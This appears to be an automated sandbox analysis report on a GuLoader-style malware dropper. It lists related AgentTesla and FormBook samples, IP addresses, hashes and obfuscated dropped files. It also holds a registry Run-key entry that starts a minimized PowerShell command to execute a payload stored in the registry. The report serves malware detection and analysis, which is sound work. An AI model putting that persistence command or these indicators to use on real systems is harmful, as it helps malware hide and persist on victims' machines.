Behavior and APIs

Time	Type	Description
09:19:58	API Interceptor	41x Sleep call for process: powershell.exe modified
17:14:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)
17:14:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	ASCD0001 INQ9829......pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Quotation - 00645.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Best Price.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Inventory_Analysis.xls	Get hash	malicious	Unknown	Browse	119.18.52.166
	Inventory_Analysis.xls	Get hash	malicious	Unknown	Browse	119.18.52.166
	Inventory_Analysis.xls	Get hash	malicious	Unknown	Browse	119.18.52.166
	Proforma Invoice.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	1080.xls	Get hash	malicious	Unknown	Browse	119.18.52.166
	DHL BL Draft copy.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Sipari#U015f detaylar#U0131.xls	Get hash	malicious	Unknown	Browse	119.18.52.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	ShippingDoc_23052024.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.21.58.98
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	103.21.58.98
	Forfaldendes253.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.21.58.98
	msimg32.dll	Get hash	malicious	Remcos	Browse	103.21.58.98
	INVOICE.js	Get hash	malicious	AgentTesla	Browse	103.21.58.98
	ORDER_245230978.pdf.js	Get hash	malicious	ADWIND	Browse	103.21.58.98
	RzDiagnostic.exe	Get hash	malicious	Unknown	Browse	103.21.58.98
	dfzesJIgdr.exe	Get hash	malicious	RedLine, Vidar	Browse	103.21.58.98
	w5c8CHID77.exe	Get hash	malicious	Unknown	Browse	103.21.58.98
	SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.25114.26828.dll	Get hash	malicious	Unknown	Browse	103.21.58.98

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	558280
Entropy (8bit):	6.993856068773167
Encrypted:	false
SSDEEP:	6144:YY8i9d6ihX1h4r56Nbtd1lQ2S8IljlYhPYjvoJbX6A5RAdFU6ewtC//o5QtWucKf:yK6+lhuy1/3IXIPYjg5Kde8CtWuzaO
MD5:	F8A9B82D69416512778AD72015181036
SHA1:	60013BBC382AD1722FC5BE5F72188C57E7A4928D
SHA-256:	DABC79A064AA9838AD06D11311FF4C72913D9A7E7C1016CC9E12DCC46D474B8A
SHA-512:	3CDCB1134407ED915E8B5D7C0A0BC8FA645373F28520ABEEE85BD68B1F875508B983941077BB2035848D61DA1C9607D775B3A6AD9423722FD300EBD8F8EF72E9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 27%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................=.....X'....@.................................0........0;.............Pz..x............................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata.......@:..........................rsrc........0;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tabsgivende.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onuf0bov.2vx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqmiw5gs.ome.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrometer.ini

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39
Entropy (8bit):	4.172989962830091
Encrypted:	false
SSDEEP:	3:K7AqN4IJMC0O8Ii8y:K7pJD0O8Ii8y
MD5:	E4E43E6724DF47009F84EA08F72ABE1B
SHA1:	9D92EEC3EBA1178B56BF6B810BA6A453361F23C8
SHA-256:	4D5734BD9C25A985E2185B77944F55461F7151F4E234C6B8D35DE32F546A625A
SHA-512:	55A2796AAA0DDDB476A304FEC63476EEDAE3B65E63F5031C79686C5C7C9C08A7518BAE7814B0FB9238782D5398993B404FC730C649952B6229DBAFC733CBC664
Malicious:	false
Preview:	[tonicizes]..hjemliges=slettekommando..

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Clas.Fre

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	330053
Entropy (8bit):	7.7111976496154995
Encrypted:	false
SSDEEP:	6144:Pzt5vwjjwDzO7ANohQWJGPPcwSlxO/BS0eoBeVAtCp4a5lOMVWBb:LTvGg4AOhpJ2PDZJWVAtCJ5EMVAb
MD5:	EC9D4FB10A2CAD8BEB3E3EBBE2352080
SHA1:	3206EF24C0818FCFC3B98E9685A4726B09049B55
SHA-256:	04BC6C8D813C64A49146F940085F7326EB471B5FFBFF99652A991EE230886847
SHA-512:	00E5D7CB5210D3365F05A6723B2747D2E6EA7A80470D42868C879889A53E01C1D8DA477622495648D17BB89BE0679CB15DF9EB72419C56B6733567BA08C1FF03
Malicious:	false
Preview:	......X............u.................N................WWW............`...S....mmmm......P..................j.....l.&...XXX......<...V...........&.$.......ddd.````.lll.....K..................66....F...........................x..s..........w.................k..&&....V..............GGG.....cc.=.....b........ll...__...............................jj..2............Z..........QQ..mmmmmm..................O...bb..\\.......................................bbbbbbbb....=............P...........^^^..hh........W......@......d....".............ccccc........................J....FFF......!!!!!!!......................G......aaaa.rr........bbb........jj......s........6...........~....................X.....................NN.............U.j..............A..................................EE.............,.............HHH..QQQ.................q...[..J....SS.......,,,...RR........}.......`..PPPP..........._..............%%%%............}}...............K.(.y....................................................

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Betnksomst.sir

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	5015
Entropy (8bit):	4.8985650628325335
Encrypted:	false
SSDEEP:	96:hNNlY4PvFXKi8l/lMQLK6I5AYf6+EJO4icDf1CLvj3dv+gUVdNdlSw:hptdXKD/cSd8JS8vDdmpIw
MD5:	13562D161E0932E108EEEC7A9A080CC4
SHA1:	90D57F31D6058D89097D0A70F2050B45B3E57C59
SHA-256:	A208A8F361E56DCC29AC934C293FE16EB3D8228621CCF4C414555899BB74C782
SHA-512:	74CDE9A08A4944FC92AB93323D67519B5415715BA904D8935C78FC119E83C9204BE57EC159894D11AE5AFD2BA4BBA9C55461335EA453187139D7DE8EBA65559A
Malicious:	false
Preview:	...............[.)................!..........%[.[.......}...3.....!.....{...........\....0.....;........M..lw.m....B......U.........Y...c'......vR..........J....q......Q.x..s.......r...........~......,........z...............N....:.........{........\|....g.....................D.4........(.......GSv........5..z....C;...}.....Z2..5Z>.\.....z................93.%..H.6...(...#...R.....7..d....?......./Q3.O..<..'...............................b.T..m....... .....1............L......M.......g/1..........j..T..t................. 8...K..k.....................-...$........<........................u.....U..Z.......7.h.Z.U..a......g.........f.[...]...Z........_...............#p.{........................f..b..N....P.=...&e.......l......M....{%.... ..v%..&.....>2.....................d.....K.......S{....;..g...).I.....5..........;........D.q.X..................+..........U.j........8.9........-.....bB.....a.....Q..d.....~..........U.........F.3..........4..........s....#...#.d.%....A....

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Deagol.lyn

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	3151
Entropy (8bit):	4.888475040183555
Encrypted:	false
SSDEEP:	48:HNXwg7qtld5/0EImXHjzG0GzqyrBqvSj26uRWKCTMT29DtDJnr47bvXtK:tXwgal//LXGrGSKzWvA2x3nr0DXtK
MD5:	F01C9151A434D50C2BC0A02EEAB55643
SHA1:	A352F519ABE2DCDC98D53AE074D584F266594133
SHA-256:	AA75AD97A7B1714CD4908B3349DDFF92AD6CCB3CCC00E5E85D362CC820CBFB9B
SHA-512:	E9A668486E71AD706F9F578BD971C1F95F6D20E6EC5E6C175CC5E13DFA318E2D648E9F08202EF3A098B84FFBE190460DED183A0910B4891B6F388DF71A7F87ED
Malicious:	false
Preview:	.2....%...........b.......c...l~......Q.......4.S.......v...m._MI.s.(....j........v...Z..............(........M.6............`............q.....?............n-....U.......\|..8..?...J.dX........T...<ze...I........Ko.P........%........A. K.....L'.....d:..............'..(......R....L.....X%.....M...........s...).......A..................x..........j.^..............p.....H..T... ......<..........R{.7.........oga..g..9.....$..d.w......U9..P..i...........{A...........o..u....Tm8.....A......c.J....T.D.c.........%......k...........;................S%........V........ie....0..m........\................7......U...TZW.^.......W(.;......c........a.....W.........=...r.Y..s....j/...[>....m...Z........................................d........................i......Ce...t...C.......&7...Q.V.1............%..N.j.0......M..{....l.B'..z.1................0.5..T....... .......R...gn.............N...=~;.Z........w..7.........j....%...25[......y..................\..?.d..&6......B...........G....

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Elmore.whi

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	3956
Entropy (8bit):	4.9140812400492795
Encrypted:	false
SSDEEP:	96:0hF1QERPlf0b53oHXvHD6iDUfkjdO6/ug:0hcERPl+54Hf+iYcjdV/J
MD5:	A1F4A5E3799EA3E3F4E36B6F38EB3780
SHA1:	BC1A831C51362FE2F6BC32341DEAF46EBBA35749
SHA-256:	BC2D8071643BE1689CBFB080360841FE0E0113D4A73C46744B9C3F052F852402
SHA-512:	39A67C351381E5B1CB77FCBD202EAB3A9C96A1C6030E02B11C45FBB8DC09E2C0CC5D675A4A3138F414E3899DC7276387F0072110169050B11065D6A54C49772D
Malicious:	false
Preview:	..qi.O.0.F.......X...X.$.............U.8...v..t/.....L..zO>...........\|..0...M^...X.?.....)m.K.....j.M.E..+..N..7)...].{..x..<..+......J....z......1.. .h_....r8......t..{..._..u......ne.......=....8...........E\|.g.S.s........r..%.I..].....#...[e.......Z..@...........9..4....M...8....A..................hI......N.V.....E........./..~....4....I...,.f..L...E................R...................3.............w%........Lu........3.......D..~...6........`....H..................q...c............\|.........................L.I...>~.`.....j...............}......2..p...Q['.....a.....+..t.%&.=q.t..+F......#...}....'3..........\|.........................K..........[.I...........t.O...k.{....]...........SiL..CBI.......................r..(.eg'\|.......=.^...53...u...$V....P...7...a..x.......@."}..g......F.u..i1C.......z.............;......f.......,....C....."...........z.N...................9.......x...............z........................R.........Qs..P..g...n.i.. ......?...&.....)..

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\cellinas.pre

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	3417
Entropy (8bit):	4.802794492019175
Encrypted:	false
SSDEEP:	48:6cL0juxhIEAylN/albd/C6VYjSEdi7bTb8DSeIOfixqPq3HI/7p5kyyL:mjuxCIYlC663i7bTQDqjqPqY7vPyL
MD5:	B7EDD8491A7D5EAA339DA0C7AB729554
SHA1:	852CFD5393E12D721CE0AA86209B0E8C43E067F5
SHA-256:	3DF2282AA8313730D7B01545096423CA26DCB1EDEA7F25AF6DF7E1BE0F626DA6
SHA-512:	2D6A41EB8D9AF00368BB71AE87B98C44B1BBEE2BD55C97DA6F3CB03CFA4B119A2C728E631C420B0ED618BD72265E0675C92AC18F231B88B0810CB1E0921E2DE2
Malicious:	false
Preview:	`......,.b...............)..8..ii..O...c......J.....\...+.....R.8..I.....x.....#.......E........../6.~...d...W../..............e............8....j.......'B...$...........,..)....\..n...#=..Z7...$_......j.P~...f..................Q.G\|.........z..\|\.....Nq(.~.....[......K..v.................k....A........J...,7......}H5..8...4..............Y...y...s...c.........r.3.....4.....P.......O..h....x...pv........S..._..."...8.A.....%@...............p....@...%r...........e....#......r...............=..E....F..y.....w............&........."..........N.{...j....&.........z......u.bw..........T........+.......5...:..n@...n.........L2$.W........-\|....,......o(.........wo...............?.....".q..I...........@...........A...TP...........J..T...k.$....`p......+..a..D...p........^.g.P_....H..............Z......D ...A.....I.C...R.R...............&.....jB..H.....#K....e....u.....@......_.$..............(....ci....../.-p..o............Q......W..=..;........R..'........-JZ.......{}...V..........2..

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\computerbrugeres.sts

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.741244587578905
Encrypted:	false
SSDEEP:	24:5Km+Ln00n4JM0jZC7IqvF/Rq4ICtP1fz4zO02/aCss:5KtQC+M0VXqvxNRJz4zOke
MD5:	7A362FEC7FE89A2BFF10F4CE7DB4168E
SHA1:	B1E761B08FD9D1035067DB280C307CA99BC7A143
SHA-256:	E8E5CC5E7AC2564E58A619F93B4F0A2CDB84B6F8940EC42B808E6ACA4517005A
SHA-512:	1DAA474FB18953FE367565CBD885097B9B2689FBDF0E42FACF5CFC2AF276165C6EE395C2C67F97D0C79D6B86FAD7321524F65FD413E01C000F37C6AB54D63C7F
Malicious:	false
Preview:	K........U......q.............'.......T.s......._........L^..J....4...I..:....... .......(..$.................`.......^...I..JO...&............]....m.-.~...............k.....8...p.....&......).................g..+..e......T....T.....[..........%tD%..........(..Z...s.G..`......8Fr..P..K.%.........U........E.......D".W....Z............z...`..A.a..............................c.......bR..@...W.j.........z..............j........>............O....L.s;.U.S.......z..[............(.r...........~.........................B.........E..........l..(.......9.........x.VV.........T{...X...3.l...b..s..x....or...5..J..#.....AX.(+........J...P.<..s..........%..FiE.....n..........s...C......CM.........................+....j.....$.....\|...........f.......g.....&.....}c...........C.....n..3.B.........Z..P.v...\|.........c.....>._........Y..x.D.u........N.N......p..".f....!g.......P].$.Um.^..s;........d......V................`..... .......82............L.cm....c....Q........V..........Y.....

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\flokken.ave

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	5109
Entropy (8bit):	4.931088915404292
Encrypted:	false
SSDEEP:	96:FDhbF7Vkpu4BtfJPaRzbPdMORxEBspFqHT+e+5BvlpB0lGgjtcYT:thBxkphBlBaRdMORxDFqyz5ZnBcH5
MD5:	17AE8090149D5A89E58B7272BA5B0912
SHA1:	ED0403F5C427F61BB58CC24CC840B5FF01CB2384
SHA-256:	7BDE00AA9C021C743ACD1C8FA1D6B1B3A88B944FA1828A5AAC901A6E1167B401
SHA-512:	953A600C5E624EC2563071E714C7EDC9A1A8EC3FAEE93536BD7232F136291D4A65DDCA76DDC515399C341AEEA9205BBC79635B54D6E1C6CCA34C21CA8A75FF76
Malicious:	false
Preview:	.....Y...~.../.\|(.....'.U..U..................D......Z...#..p.Q.9...F.....^............A:...-f....E...D.D..A........<...............~..z...6........g..k. ...................-......yu...Y.......2.n.......C..s......].................#......_."..................\N.........8.........d.t.0.....2..E..2.ZZ.M........l...e..^.....6.%..sh...............................a.n......g&...E...9......[....;......f......np.........D................].............b..z.........._...5...~..........Y........@..........&..................T,....h........od.....e..v..r...h............Q...p.....Bu.....\|..?......3.{..P..j.d........%....8.T.d..+..............5..+......!......H...0..........q..............`H.k.a...'....!...a........H...n....n...=...m.+D..........(.Y...H.......$...............r..M.............Q..?7.[.............v..............d..D..M.....\|r..T.L..`...I.7...P.p...........\|.....g..`......;...2...................m....m.>...<.<..SU..................)b....x.....................L....q......v

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\hydrolytisk.cun

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	1964
Entropy (8bit):	4.90457463775936
Encrypted:	false
SSDEEP:	48:rZdwWIU3Jclw+hkIs0bAhxS4/kC+2wH/pRcYfUo:HwW1whHsFxS4/r+26RrUo
MD5:	DF35D40A84AFCB121969409BC40F79D4
SHA1:	AECE97CF6FC9E487F288032D89FD19BCA62B2AC3
SHA-256:	82B0E73A730C6791CFB20F24499FC915A95CECD40F86A0A651D0990A96552130
SHA-512:	598FBFC47CDBB31107240647741A7EC8111DD0C039550CC33246CACC58BEB54C77E29059AD10E8340309B18665FC955DA284A0E38A6EA3FE8F3D096EDCE9FFDF
Malicious:	false
Preview:	AE#..d.......L. ......=.....u......................a....x.....b.....V..........X...b...............4......A....5Q3...j..............................k.O........y\.:.R.....q.B..................z.u...........:.........d....]...............E....c........'..dr.IA:....B..n..G....m.lJG................%G.........V............E........h.....z{..P..4SgE..........l..6..4.....M=..(.&.....g..:...R..................0...........%....4..u...../..Du...f......"...W.~ .......b.9d..j......>{.P........!L~..........(..{... ..j..d..^!.c......G.2..[.......y.........Hy....B.....!.@S.C....,........x........_.....0.I...N.b.......z.R.:..t`........e.s..j{.......F......`.F..a............4......`.i..]V...@...............A.A..........U,..P.....U.\|..!.J........].......4..........i...~....7t.......jR.........y..x..2...\................I.a... .:.....X........q-.....!.............t....V.....7.....G.T......./..........t`.~.[..t,......;..B....D.K...2.......x.}SC...........m...........V..........2..........

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\initialiser.gau

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	Matlab v4 mat-file (little endian) O\261, numeric, rows 16056502, columns 1828126720, imaginary
Category:	dropped
Size (bytes):	1615
Entropy (8bit):	4.787337099482735
Encrypted:	false
SSDEEP:	24:KC/3cDbhYsSFZryMTk21Mv9EVPtg0dOdpVNZr/avQ92/PAqTe:KS3UbxSfWCnEqddYZjpbq
MD5:	807140EEB4D1C087B3B27FB683108487
SHA1:	05F7CDA0A32C2F8564D1D1CC16FDDF211E6D73B3
SHA-256:	87EBEBE148D9C97623F21A9847E07B6CCBCF3194BA56886D889989D0ACF7DBEA
SHA-512:	5D6731F488457D53A5845B8559253C66DC251FA0E8044AC425495B73A5C46C069B16D1E9FFF25D803F0BD6B9336205647B77EE9EBBD259B886D24692DA07E045
Malicious:	false
Preview:	...........l...o...EO....B...N............................%....F.................,.Z..........+......./...@..b...E....Z...T._...f..q........r...[%...l..D.2../.l...=2.r..!W....t....Q.YR..'...........".......?..C]........fO.f.............8.c...........<...............K.....k....}.....=....Y~6.......@(.d....b.;................>..............\|.....'_..............).....(.......-..1.....R<;qW..........Y...J..Z.x.............x....l......Y....Y'.o......:.......@......l......W.......B...........:.>......c........^.......j."...O...&...p..>....Z...................E....qV....{..S.........M.....k........+K.#...\|....P....Z.>.......vz:.....D....p....e..K..k.^m....4}[........I.(...w.....Z......G..............8......K9k....`...-........9..........Te_.......Z..Z....j..D...........L..........\|.....k.F...p.A...............~.y..........i...q........<......R..!..y...`.F..........e........LG.......*......................w.................R.;..,.....@......\|.....X.b....U-..u....!..M......

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\philopornist.ant

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	4780
Entropy (8bit):	4.918865074118872
Encrypted:	false
SSDEEP:	96:L4bDqETS85bdsgiDXGD7EQ67kCx9zpWHy/tq8k:wDDHM7MAdwCH2wk
MD5:	3F28B68878DB110B099C2AA9285ABEC7
SHA1:	09CBC46BFE26CD272916AAF6739FD5A7505C06BE
SHA-256:	2A775985173B2EC6CDC5BEA576D6B10F35D852A03EDF5C788DCC1C7403538394
SHA-512:	76DAACCA0BFAA4853B051CCD5849D762E2CEFEE9FE42A668332F8A6AE933FDC4A6ABA567E2709C744A41096F1865DC5497CD9C7E4B7006F73FD9C9DE3F498FA0
Malicious:	false
Preview:	G.c,..0..../...............7...<.m....i......&.... .......O...................K.....DS.....%.o.........]_C.......... .....{.......a....+........<...................5.....B.6..'....>...'i.........o.........................u................7..a/......7.......ut............n...":.......R.....\|.......#O...l...`D..Y.0.....k>...........4m..........?mK..{WF.2...`f.S...h..?.O..q"...>}.......M..........E.;......x.Q....R............E [..v.........d.y........T"........./.(..b.....P...f.........^...T......{........;...-...............{........9....]...........{...r......H...lZB..8.....T.........O.%....vd.8........\|..............C..U..S&W...#..W....m... .....2..............K..............Iik.......K...B..._..j.......................D.Z]"....K46................m..../$k....e...j.q..wn..........f...............L...".kQ.=......e(..x@..............sUM.L.......H........O..]e.......aJ......................3.=..X....y........?...........t..... .O..Q3.9..............8;.Z.~..}....0...V.....M...e..b....

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\portmantle.txt

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.1982003929345
Encrypted:	false
SSDEEP:	12:CwwwpABSTe5eOtdKb/cE/gF7+tLJ89Tg7rtISMj+T:lySmeq0bvoSuUHtISMj8
MD5:	2E5B46354BBCC496B5CE4589B4730CD6
SHA1:	C9BFD2254BC73ECEF4FC47EDBFA77965E6D326E0
SHA-256:	A52BCFF2592E2F5B7B14150CB238FDEC9BE00993D9C268A66850A78A41A41F3D
SHA-512:	81DF260AA8D8F2C5724FCA9A13C2CACC7076261CB611A49AB49B8DC85A1847E383AC5D395D17FA7642877382BE1566D9F68C0C54CEF46714797EDD176AA7E25A
Malicious:	false
Preview:	navngivelsernes militre dobbeltgrebets stderiet vivre.moche ambiparous gdedes presweeten wageworker appositeness unefficient.vitalist religieuses baandmaalets linielngde sutteflaskens steds extracondensed..koncentreringernes reducerende loosener taylors.diktioner sammenhobningen bankkrigen surfusion producibleness marekats gedebukkestyret branchiata smedejernslaagen fjernlys stikkelsbrgrdens socialdirektrs geelbek..knleddets slageren suspensibility.

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\puntout.umo

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	3063
Entropy (8bit):	5.00274010952143
Encrypted:	false
SSDEEP:	48:i5KYKGsvjv4cBq4TQIbC/ryLNF7/as1vUUTrvPl+frfLeChGl2x2O+h:Gsvjwi3QIbC/ry/7is1vZXPlefM/h
MD5:	A320CC2234BE62AD508B3CE096AB6C18
SHA1:	980D4871A0926455594680FE750126DD813D7F0D
SHA-256:	1538A9E707E2CE997E88A7DB8639819F27B4F4173BF5EB33F8EA8619975A7700
SHA-512:	C3BAD380B95A35ED307F93B7F422E8273C34C84806B76A97859FE3B8EC347575CCD478060C65DF748280E08FE0D5F73F9CD5F87E95FBAE48C0D4F28F1B8D8D70
Malicious:	false
Preview:	..........4..`...a..qr....N...........Z..4.....`\|Q<.W...w...............}...h..................+....H..r\.................@......X...+....'...........B+.j..cc.....6....... .............. .......+..S9.J.........f:...(.............>ZS..........;.......#.......:.i.4.VG...........L.....U.........a.-.S...............-...y..A...........&I...................4. ......$..`.......+LK..Uk..........5..=......Q.E.....'...u..8...=.D....0.......n..U....y.OPFl......%y....}........-.....I....".....3.....Wd).........).........n+E.U...............;....Hq..7.........=...........<...2....._...........L.p..N..........ea....m...D..$...7...;.M..L........$s."f...........C....;......@............<...........a].....C_...@..N.....................]..3.V\........E.\.....]M............I..............A..-..>.S(....l..o.....f........#..........n.t.`...)....u.<.............>..$.....L..%..3...........d]..................;.......aT...........].5....)...W........7.....6=...<..E.....V.Q ......B....._.. .

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\quizdeltagerne.kle

Download File

Process:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
File Type:	data
Category:	dropped
Size (bytes):	4319
Entropy (8bit):	4.840258406048554
Encrypted:	false
SSDEEP:	96:+UTvqs0SRisWPQZf9r18j/Kef71GLBzk9YULH:+Yq/SXuDK671GNzdULH
MD5:	F8BC1702E49C38114F0562877FAF6734
SHA1:	4EEE673ACB409D871CFA046F3B78DF3C37DD4EB3
SHA-256:	3E87E729E1234916E3F7AF4D4482CDFD2609DDE14A546368F04754818033AF85
SHA-512:	CE0DCC0263D7D533E13C863C4EF1DE10A38D4088CDF540F1500133654F6C90225C74366B016C2028B662E9CEBD8B2869DFBB8297FD579439EE1197E9E96D0035
Malicious:	false
Preview:	....;c..J..L............7.V`.........J.......1.xn.P...t[..I!;..N...........&....p..........\|......b..\.y.../..............m..`.......[...Z....#s b....................E..!)2.p...........j.R.....J..7...6t)....'..0..<...z....?y......................t.......9......P.t...!......'9......B...(x.............s.~........]6d.....Q.S..{F..B............{Y.........s.d........R.............Z......6..3.j......@.GC.............2.....`.........N..g..=6...?...`...)...............{l........g.h.................?.......o......{M........6.......V..._...T..c.Q..=.1.......#.#.p..................U.o.._.:.d@.......V....1...^...........c....2.........I`.....H... .C5.P@.................................8..w..Ta.....v...~........V........(......b......7s#................`...'.P....ti1.......rX..............P....q.......^.l....`..2..W.J..Y..,Z...Y..w...........A......{>e.&........../.o.............S.%....Y#............A.?r................#K...%....s.........>...........R......".......+........J.N........

C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns

Download File
